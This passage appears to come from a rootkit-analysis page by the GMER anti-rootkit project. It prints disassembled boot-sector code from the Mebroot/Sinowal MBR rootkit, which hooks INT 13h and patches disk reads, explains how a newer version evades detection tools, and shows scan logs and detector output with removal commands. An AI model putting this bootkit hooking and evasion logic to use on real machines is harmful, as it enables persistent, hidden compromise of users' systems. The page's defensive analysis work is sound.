(01) 61 POPA cs:7cf5 (02) b0 83 MOV AL, 0x83 cs:7cf7 (02) f2 ae REPNZ SCASB cs:7cf9 (02) 75 25 JNZ 0x7d20 cs:7cfb (08) 66 26 813d c402e900 CMP DWORD ES:[DI], 0xe902c4 cs:7d03 (02) 75 f2 JNZ 0x7cf7 cs:7d05 (09) 66 26 817d 04 00e9fdff CMP DWORD ES:[DI+0x4], 0xfffde900 cs:7d0e (02) 75 e7 JNZ 0x7cf7 cs:7d10 (09) 66 26 c745 fc 90909083 MOV DWORD ES:[DI-0x4], 0x83909090 cs:7d19 (05) 26 8365 06 00 AND WORD ES:[DI+0x6], 0x0 cs:7d1e (02) eb d7 JMP 0x7cf7 cs:7d20 (02) 66 61 POPAD cs:7d22 (01) 07 POP ES cs:7d23 (01) 9d POPF cs:7d24 (03) ca 0200 RETF 0x2 |
cs:7c00 (01) fa CLI cs:7c01 (02) 33db XOR BX, BX cs:7c03 (02) 8ed3 MOV SS, BX cs:7c05 (05) 36 8926 fe7b MOV SS:[0x7bfe], SP cs:7c0a (03) bc fe7b MOV SP, 0x7bfe cs:7c0d (01) 1e PUSH DS cs:7c0e (02) 66 60 PUSHAD cs:7c10 (01) fc CLD cs:7c11 (02) 8edb MOV DS, BX cs:7c13 (03) be 1304 MOV SI, 0x413 cs:7c16 (03) 832c 02 SUB WORD [SI], 0x2 cs:7c19 (01) ad LODSW cs:7c1a (03) c1e0 06 SHL AX, 0x6 cs:7c1d (02) 8ec0 MOV ES, AX cs:7c1f (03) be 007c MOV SI, 0x7c00 cs:7c22 (02) 33ff XOR DI, DI cs:7c24 (03) b9 0001 MOV CX, 0x100 cs:7c27 (02) f3 a5 REP MOVSW cs:7c29 (03) b8 0202 MOV AX, 0x202 cs:7c2c (02) b1 3d MOV CL, 0x3d cs:7c2e (03) ba 8000 MOV DX, 0x80 cs:7c31 (02) 8bdf MOV BX, DI cs:7c33 (02) cd 13 INT 0x13 cs:7c35 (02) 33db XOR BX, BX cs:7c37 (01) 90 NOP cs:7c38 (04) 66 8b47 4c MOV EAX, [BX+0x4c] cs:7c3c (05) 66 26 a3 7400 MOV ES:[0x74], EAX cs:7c41 (05) c747 4c 6700 MOV WORD [BX+0x4c], 0x67 cs:7c46 (03) 8c47 4e MOV WORD [BX+0x4e], ES cs:7c49 (01) 06 PUSH ES cs:7c4a (03) 68 4e00 PUSH 0x4e cs:7c4d (01) cb RETF cs:7c4e (01) fb STI cs:7c4f (02) 8ec3 MOV ES, BX cs:7c51 (03) b8 0102 MOV AX, 0x201 cs:7c54 (03) b9 3f00 MOV CX, 0x3f cs:7c57 (03) ba 8000 MOV DX, 0x80 cs:7c5a (02) b7 7c MOV BH, 0x7c cs:7c5c (02) cd 13 INT 0x13 cs:7c5e (02) 66 61 POPAD cs:7c60 (01) 1f POP DS cs:7c61 (01) 5c POP SP cs:7c62 (05) ea 007c 0000 JMP FAR 0x0:0x7c00 cs:7c67 (01) 9c PUSHF cs:7c68 (03) 80fc 42 CMP AH, 0x42 cs:7c6b (02) 74 0b JZ 0x7c78 cs:7c6d (03) 80fc 02 CMP AH, 0x2 cs:7c70 (02) 74 06 JZ 0x7c78 cs:7c72 (01) 9d POPF cs:7c73 (05) ea 0000 0000 JMP FAR 0x0:0x0 cs:7c78 (05) 2e 8826 9100 MOV CS:[0x91], AH cs:7c7d (01) 9d POPF cs:7c7e (01) 9c PUSHF cs:7c7f (05) 2e ff1e 7400 CALL FAR WORD CS:[0x74] cs:7c84 (04) 0f82 9d00 JB 0x7d25 cs:7c88 (01) 9c PUSHF cs:7c89 (01) fa CLI cs:7c8a (01) 06 PUSH ES cs:7c8b (02) 66 60 PUSHAD cs:7c8d (01) fc CLD cs:7c8e (02) b4 00 MOV AH, 0x0 cs:7c90 (02) b5 00 MOV CH, 0x0 cs:7c92 (03) 80fd 42 CMP CH, 0x42 cs:7c95 (02) 75 04 JNZ 0x7c9b cs:7c97 (01) ad LODSW cs:7c98 (01) ad LODSW cs:7c99 (02) c41c LES BX, WORD [SI] cs:7c9b (02) 85c0 TEST AX, AX cs:7c9d (02) 75 01 JNZ 0x7ca0 cs:7c9f (01) 40 INC AX cs:7ca0 (02) 8bc8 MOV CX, AX cs:7ca2 (02) b0 8b MOV AL, 0x8b cs:7ca4 (03) c1e1 09 SHL CX, 0x9 cs:7ca7 (02) 8bfb MOV DI, BX cs:7ca9 (01) 60 PUSHA cs:7caa (02) f2 ae REPNZ SCASB cs:7cac (02) 75 47 JNZ 0x7cf5 cs:7cae (08) 66 26 813d f085f674 CMP DWORD ES:[DI], 0x74f685f0 cs:7cb6 (02) 75 f2 JNZ 0x7caa cs:7cb8 (06) 26 817d 05 803d CMP WORD ES:[DI+0x5], 0x3d80 cs:7cbe (02) 75 ea JNZ 0x7caa cs:7cc0 (04) 26 8a45 04 MOV AL, ES:[DI+0x4] cs:7cc4 (02) 3c 21 CMP AL, 0x21 cs:7cc6 (02) 74 04 JZ 0x7ccc cs:7cc8 (02) 3c 22 CMP AL, 0x22 cs:7cca (02) 75 de JNZ 0x7caa cs:7ccc (03) be 0b02 MOV SI, 0x20b cs:7ccf (04) 2e 803c 00 CMP BYTE CS:[SI], 0x0 cs:7cd3 (02) 75 20 JNZ 0x7cf5 cs:7cd5 (03) 2e 8804 MOV CS:[SI], AL cs:7cd8 (06) 26 c745 ff ff15 MOV WORD ES:[DI-0x1], 0x15ff cs:7cde (03) 66 8cc8 MOV EAX, CS cs:7ce1 (04) 66 c1e0 04 SHL EAX, 0x4 cs:7ce5 (03) 05 0002 ADD AX, 0x200 cs:7ce8 (05) 66 2e a3 fc01 MOV CS:[0x1fc], EAX cs:7ced (03) 2d 0400 SUB AX, 0x4 cs:7cf0 (05) 66 26 8945 01 MOV ES:[DI+0x1], EAX cs:7cf5 (01) 61 POPA cs:7cf6 (02) b0 83 MOV AL, 0x83 cs:7cf8 (02) f2 ae REPNZ SCASB cs:7cfa (02) 75 25 JNZ 0x7d21 cs:7cfc (08) 66 26 813d c402e900 CMP DWORD ES:[DI], 0xe902c4 cs:7d04 (02) 75 f2 JNZ 0x7cf8 cs:7d06 (09) 66 26 817d 04 00e9fdff CMP DWORD ES:[DI+0x4], 0xfffde900 cs:7d0f (02) 75 e7 JNZ 0x7cf8 cs:7d11 (09) 66 26 c745 fc 90909083 MOV DWORD ES:[DI-0x4], 0x83909090 cs:7d1a (05) 26 8365 06 00 AND WORD ES:[DI+0x6], 0x0 cs:7d1f (02) eb d7 JMP 0x7cf8 cs:7d21 (02) 66 61 POPAD cs:7d23 (01) 07 POP ES cs:7d24 (01) 9d POPF cs:7d25 (03) ca 0200 RETF 0x2 |
To deceive few available detection/removal tools ( including GMER ) new version of rootkit modifies original pointers to CLASSPNP!ClassReadWrite in CLASSPNP.SYS!ClassInitialize function and pointers of \Device\CdRom0 MajorFunction table. The previous version of GMER finds original pointer of CLASSPNP!ClassReadWrite in \Device\CdRom0 MajorFunction table, so now, it cannot read infected MBR.
However, all these new malware tricks will imply more changes visible in the log - see below old GMER 1.0.12 scan.
GMER 1.0.12.12010 - http://www.gmer.net Rootkit scan 2008-03-26 09:01:20 Windows 5.1.2600 Dodatek Service Pack 2 ---- Kernel code sections - GMER 1.0.12 ---- PAGE CLASSPNP.SYS!ClassInitialize + F4 F9A934B2 4 Bytes [ 7E, 78, 82, 81 ] PAGE CLASSPNP.SYS!ClassInitialize + FF F9A934BD 4 Bytes [ 28, 24, 82, 81 ] PAGE CLASSPNP.SYS!ClassInitialize + 10A F9A934C8 4 Bytes [ 90, 78, 82, 81 ] PAGE CLASSPNP.SYS!ClassInitialize + 111 F9A934CF 4 Bytes [ 84, 78, 82, 81 ] PAGE CLASSPNP.SYS!ClassInitialize + 118 F9A934D6 4 Bytes [ 8A, 78, 82, 81 ] PAGE ... ---- Devices - GMER 1.0.12 ---- Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_CREATE 8182787E Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_CLOSE 8182787E Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_READ 81822428 Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_WRITE 81822428 Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_FLUSH_BUFFERS 81827890 Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_DEVICE_CONTROL 8182788A Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_INTERNAL_DEVICE_CONTROL 81827884 Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_SHUTDOWN 81827890 Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_POWER 8182789C Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_SYSTEM_CONTROL 818278A2 Device \Driver\Cdrom \Device\CdRom0 IRP_MJ_PNP 81827896 Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_CREATE 8182787E Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_CLOSE 8182787E Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_READ 81822428 Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_WRITE 81822428 Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_FLUSH_BUFFERS 81827890 Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_DEVICE_CONTROL 8182788A Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_INTERNAL_DEVICE_CONTROL 81827884 Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_SHUTDOWN 81827890 Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_POWER 8182789C Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_SYSTEM_CONTROL 818278A2 Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_PNP 81827896 ---- Threads - GMER 1.0.12 ---- Thread 4:444 81827BF6 Thread 4:1672 818299A0 Thread 4:1680 81821E5C Thread 4:480 81827F38 Thread 4:464 8185A0A0 Thread 4:468 818471A0 Thread 4:488 8188FDD0 Thread 4:1524 81833220 ---- EOF - GMER 1.0.12 ----
To detect/remove this rootkit, please use latest version of mbr.exe tool or GMER.
Stealth MBR rootkit detector 0.2.2 by Gmer, http://www.gmer.net device: opened successfully user: MBR read successfully kernel: MBR read successfully MBR rootkit infection detected ! MBR INT 0x13 hook detected ! malicious code @ sector 0x3fdc80 size 0x1ca ! copy of MBR has been found in sector 62 ! original MBR restored successfully !
All possible options are available after running command: "mbr -?"
Stealth MBR rootkit detector 0.2.2 by Gmer, http://www.gmer.net Usage: mbr.exe [options] -f - fix mbr -c start_sector size_in_sectors filename - copy selected sectors to file samples of usage: mbr.exe -c 0 1 copy_of_sector_00 mbr.exe -c 0x3fdc80 0x1ca copy_of_mbr_rk
GMER 1.0.15.14966 - http://www.gmer.net Rootkit scan 2009-04-05 17:37:42 Windows 5.1.2600 Service Pack 1 ---- Devices - GMER 1.0.15 ---- Device \Driver\atapi \Device\Ide\IdePort0 813A9560 Device \Driver\atapi \Device\Ide\IdeDeviceP0T0L0-3 813A9560 Device \Driver\atapi \Device\Ide\IdePort1 813A9560 Device \Driver\atapi \Device\Ide\IdeDeviceP1T0L0-e 813A9560 ---- Threads - GMER 1.0.15 ---- Thread System [4:1672] 813DA300 Thread System [4:1676] 813C69F6 Thread System [4:1692] 813F8387 Thread System [4:1700] 813C9971 Thread System [4:1080] 813DA300 Thread System [4:1084] 813C69F6 Thread System [4:1016] 813F8387 Thread System [4:1108] 813C9971 ---- EOF - GMER 1.0.15 ----
C:\>mbr.exe -t Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.6 by Gmer, http://www.gmer.net device: opened successfully user: MBR read successfully called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x85938E90]<< kernel: MBR read successfully detected MBR rootkit hooks: \Driver\atapi -> 0x85938e90 \Device\Harddisk0\DR0 -> ParseProcedure -> 0x8593fc20 NDIS: Intel(R) 82566DM-2 Gigabit Network Connection -> SendCompleteHandler -> 0x8596e700 Warning: possible MBR rootkit infection ! copy of MBR has been found in sector 0x0100A757 malicious code @ sector 0x0100A75A ! PE file found in sector at 0x0100A770 ! MBR rootkit infection detected ! Use: "mbr.exe -f" to fix.
C:\>mbr -t -s Stealth MBR rootkit/Mebroot/Sinowal/TDL4 detector 0.4.1 by Gmer, http://www.gmer.net Windows 5.1.2600 Disk: Maxtor_6Y120P0 rev.YAR41BW0 -> \Device\Ide\IdePort0 device: opened successfully user: MBR read successfully Disk trace: called modules: ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys hal.dll >>UNKNOWN [0x866DB566]<< _asm { PUSH EBP; MOV EBP, ESP; PUSH ECX; MOV EAX, [EBP+0x8]; CMP EAX, [0x866e1624]; MOV EAX, [0x866e16a0]; PUSH EBX; PUSH ESI; MOV ESI, [EBP+0xc]; MOV EBX, [ESI+0x60]; PUSH EDI; JNZ 0x20; MOV [EBP+0x8], EAX; } 1 nt!IofCallDriver[0x804E13B9] -> \Device\Harddisk0\DR0[0x8673CAB8] 3 CLASSPNP[0xF788FFD7] -> nt!IofCallDriver[0x804E13B9] -> \Device\0000005f[0x8677EE88] 5 ACPI[0xF77E6620] -> nt!IofCallDriver[0x804E13B9] -> [0x86763D98] \Driver\atapi[0x86716270] -> IRP_MJ_CREATE -> 0x866DB566 kernel: MBR read successfully _asm { XOR AX, AX; MOV SS, AX; MOV SP, 0x7c00; MOV ES, AX; MOV DS, AX; MOV SI, 0x7c00; MOV DI, 0x600; MOV CX, 0x200; CLD ; REP MOVSB ; PUSH AX; PUSH 0x61c; RETF ; STI ; PUSHA ; MOV CX, 0x137; MOV BP, 0x62a; ROR BYTE [BP+0x0], CL; INC BP; } detected hooks: \Device\Ide\IdeDeviceP0T0L0-3 -> \??\IDE#DiskMaxtor_6Y120P0__________________________YAR41BW0#335930334d57455920 2020202020202020202020#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} device not found \Driver\atapi DriverStartIo -> 0x866DB3B2 user != kernel MBR !!! sectors 240121726 (+241): user != kernel Warning: possible TDL4 rootkit infection ! TDL4 rootkit infection detected ! Use: "mbr.exe -f" to fix.
C:\>mbr -t -s Stealth MBR rootkit/Mebroot/Sinowal/TDL4 detector 0.4.2 by Gmer, http://www.gmer.net Windows 5.1.2600 Disk: ST3250620A rev.3.AAE -> Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3 device: opened successfully user: MBR read successfully Disk trace: called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x813F4F80]<< _asm { PUSH EBX; PUSH EDI; PUSH ESI; SUB ESP, 0x430; MOV DWORD [ESP+0x278], 0x39; MOV [ESP+0x204], EAX; } 1 ntkrnlpa!IofCallDriver[0x804EDE00] -> \Device\Harddisk0\DR0[0x8165C030] 3 CLASSPNP[0xF99DD05B] -> ntkrnlpa!IofCallDriver[0x804EDE00] -> \Device\Ide\IdeDeviceP0T0L0-3[0x818003E8] \Driver\atapi[0x81800B30] -> IRP_MJ_INTERNAL_DEVICE_CONTROL -> 0x813F4F80 kernel: MBR read successfully _asm { XOR AX, AX; MOV SS, AX; MOV SP, 0x7c00; STI ; PUSH AX; POP ES; PUSH AX; POP DS; CLD ; MOV SI, 0x7c1b; MOV DI, 0x61b; PUSH AX; PUSH DI; MOV CX, 0x1e5; REP MOVSB ; RETF ; MOV BP, 0x7be; MOV CL, 0x4; CMP [BP+0x0], CH; JL 0x2e; JNZ 0x3a; } detected disk devices: detected hooks: \Driver\atapi -> 0x813f4f80 NDIS: AMD PCNET Family PCI Ethernet Adapter -> SendCompleteHandler -> 0x81427a20 user != kernel MBR !!! MBR rootkit infection detected ! Use: "mbr.exe -f" to fix.